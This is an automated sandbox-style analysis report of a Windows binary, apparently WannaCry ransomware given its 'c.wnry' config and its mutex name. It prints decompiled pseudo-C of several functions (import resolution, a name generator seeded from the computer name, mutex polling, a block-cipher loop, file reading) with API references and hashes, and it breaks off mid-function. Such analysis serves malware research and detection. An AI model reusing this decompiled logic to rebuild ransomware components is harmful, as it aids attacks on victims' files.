						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}

0x004027e6
0x004027ee
0x004027ee
0x004027f1
0x004027f6
0x004027f7
0x004027fa
0x00402801
0x0040280d
0x0040281a
0x0040291c
0x00000000
0x0040291f
0x00402825
0x00402825
0x0040282a
0x00000000
0x00000000
0x00402830
0x00402836
0x0040283a
0x00402840
0x004028fd
0x004028fd
0x00402903
0x00000000
0x00402903
0x00402846
0x00402851
0x00402854
0x0040285e
0x004028f0
0x004028f6
0x004028fd
0x00000000
0x004028fd
0x00402864
0x0040286a
0x0040286d
0x00402870
0x00402873
0x00402877
0x00402889
0x0040288b
0x00402879
0x0040287e
0x00402881
0x00402881
0x0040288e
0x00402891
0x00402895
0x00000000
0x00000000
0x0040289c
0x004028ab
0x004028ab
0x004028b0
0x0040289e
0x0040289e
0x0040289e
0x004028a1
0x004028a1
0x004028b7
0x004028ba
0x004028bd
0x004028c1
0x004028cc
0x00000000
0x004028c3
0x004028c3
0x004028c7
0x00000000
0x004028c7
0x004028c1
0x004028d4
0x00402909
0x0040290f
0x00402916
0x00000000
0x00402916
0x004028d6
0x004028e4
0x00402822
0x00000000
0x00402822
0x00000000
0x004028ea
0x00000000
0x00402825
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
realloc.MSVCRT(85000001,317459C0), ref: 00402854
IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC

Strings

?!@, xrefs: 004027DF

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Read$realloc
String ID: ?!@
API String ID: 1241503663-708128716
Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}

0x0040122e
0x00401239
0x00401240
0x00401249
0x00401250
0x00401252
0x0040125f
0x0040126b
0x00401277
0x0040127e
0x00401280
0x00401286
0x00401289
0x0040128c
0x00401297
0x0040129d
0x00401286
0x004012a1
0x004012ae
0x004012b2
0x004012b4
0x004012b5
0x004012ba
0x004012be
0x004012c0
0x004012c0
0x004012c4
0x004012c5
0x004012ce
0x004012d1
0x004012d2
0x004012c0
0x004012d6
0x004012d9
0x004012dd
0x004012e1
0x004012e2
0x004012eb
0x004012ee
0x004012ee
0x004012f1
0x004012f4
0x004012fc

APIs

GetComputerNameW.KERNEL32(?,0000018F,?,?,00000000), ref: 0040125F
wcslen.MSVCRT(?,?,00000000), ref: 00401279
wcslen.MSVCRT(?,00000000), ref: 00401298
srand.MSVCRT(00000001,00000000), ref: 004012A1
rand.MSVCRT ref: 004012AE
rand.MSVCRT ref: 004012C0
rand.MSVCRT ref: 004012DD

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: rand$wcslen$ComputerNamesrand
String ID:
API String ID: 3058258771-0
Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}

0x0040707a
0x00407080
0x00407091
0x00407091
0x00407097
0x0040709a
0x0040709e
0x004070a5
0x004070a7
0x004070a9
0x004070ab
0x004070b1
0x004070b1
0x004070b3
0x004070b6
0x004070b7
0x004070bd
0x004070bf
0x004070ca
0x004070cf
0x004070df
0x004070e4
0x004070e7
0x004070f1
0x004070fb
0x00407101
0x0040710a
0x00407118
0x00407121
0x00000000
0x0040712c
0x00407121
0x00407135

APIs

GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
String ID:
API String ID: 2935503933-0
Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669

Uniqueness

Uniqueness Score: -1.00%

Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}

0x00401f16
0x00401f1c
0x00401f24
0x00401f4c
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f26
0x00401f26
0x00401f31
0x00401f39
0x00000000
0x00000000
0x00401f40
0x00401f46
0x00401f4a
0x00000000
0x00000000
0x00000000
0x00401f4a
0x00401f52
0x00401f5a
0x00000000

APIs

sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
Sleep.KERNEL32(000003E8), ref: 00401F40
CloseHandle.KERNEL32(00000000), ref: 00401F52

Strings

%s%d, xrefs: 00401F10
Global\MsWinZonesCacheCounterMutexA, xrefs: 00401F08

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CloseHandleMutexOpenSleepsprintf
String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
API String ID: 2780352083-2959021817
Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8

Uniqueness

Uniqueness Score: -1.00%

Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}

0x00403a7f
0x00403a87
0x00403a91
0x00403a9a
0x00403a9f
0x00403aa0
0x00403aa0
0x00403aa5
0x00403aaa
0x00403bba
0x00403bc2
0x00403bcb
0x00403bd0
0x00403bd1
0x00403bd9
0x00403bda
0x00403bdb
0x00403bdc
0x00403be0
0x00403be3
0x00403be6
0x00403be9
0x00403bee
0x00403bf1
0x00403bf4
0x00403bf6
0x00403bf6
0x00403bf9
0x00403bf9
0x00403bfc
0x00403c00
0x00403c02
0x00403c02
0x00403c06
0x00403c0e
0x00403c0e
0x00403c12
0x00403c17
0x00403c1a
0x00403c1f
0x00403c26
0x00403c28
0x00403c2b
0x00403c2e
0x00403c2e
0x00403c33
0x00403c3c
0x00403c41
0x00403c44
0x00403c47
0x00403c47
0x00403c4a
0x00403c50
0x00403c52
0x00403c58
0x00403c5b
0x00403c5d
0x00403c5d
0x00403c63
0x00403c63
0x00403c66
0x00403c6a
0x00403c6c
0x00403c6c
0x00403c70
0x00403c78
0x00403c78
0x00403c7c
0x00403c81
0x00403c84
0x00403c89
0x00403c90
0x00403c92
0x00403c95
0x00403c98
0x00403c98
0x00403c9d
0x00403ca6
0x00403cab
0x00403cb1
0x00403cb1
0x00403c9d
0x00403cb7
0x00403cbd
0x00403cc7
0x00403ab0
0x00403ab0
0x00403abc
0x00000000
0x00403ac2
0x00403ac6
0x00403b2c
0x00403b2f
0x00403b32
0x00403b35
0x00403b38
0x00403b8d
0x00403b91
0x00403b93
0x00403b97
0x00403b9c
0x00403ba7
0x00403ba9
0x00403bab
0x00403bad
0x00403bb0
0x00000000
0x00403b93
0x00403b3a
0x00403b3c
0x00403b40
0x00403b42
0x00403b4c
0x00403b55
0x00403b68
0x00403b6d
0x00403b78
0x00403b7b
0x00403b7d
0x00403b7f
0x00403b81
0x00403b84
0x00000000
0x00403b42
0x00403b40
0x00403ac8
0x00403acb
0x00403ace
0x00403ad0
0x00403ad3
0x00403ad8
0x00403ada
0x00403ade
0x00403aed
0x00403b00
0x00403b05
0x00403b10
0x00403b13
0x00403b15
0x00403b17
0x00403b19
0x00403b1c
0x00403ada
0x00403ad8
0x00403b25
0x00403b25
0x00403abc

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID:
API String ID: 2382887404-0
Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
fclose.MSVCRT(00000000), ref: 00401058

Strings

c.wnry, xrefs: 00401016

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: fclosefopenfreadfwrite
String ID: c.wnry
API String ID: 4000964834-3240288721
Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE

Uniqueness

Uniqueness Score: -1.00%

Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}

0x004018fc
0x004018fe
0x00401903
0x0040190e
0x0040190f
0x0040191c
0x00401922
0x00401925
0x00401928
0x0040193a
0x00401940
0x00401946
0x00401950
0x00401952
0x00401958
0x0040196a
0x0040196c
0x00401971
0x00401987
0x0040198a
0x0040198b
0x0040198c
0x0040198f
0x00401990
0x0040199b
0x0040199d
0x0040199f
0x0040199f
0x0040199b
0x00401971
0x00401958
0x004019a0
0x004019a5
0x004019a6
0x004019d5
0x004019e0

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
_local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AllocCreateGlobalReadSize_local_unwind2
String ID:
API String ID: 2811923685-0
Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC

Uniqueness

Uniqueness Score: -1.00%

Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
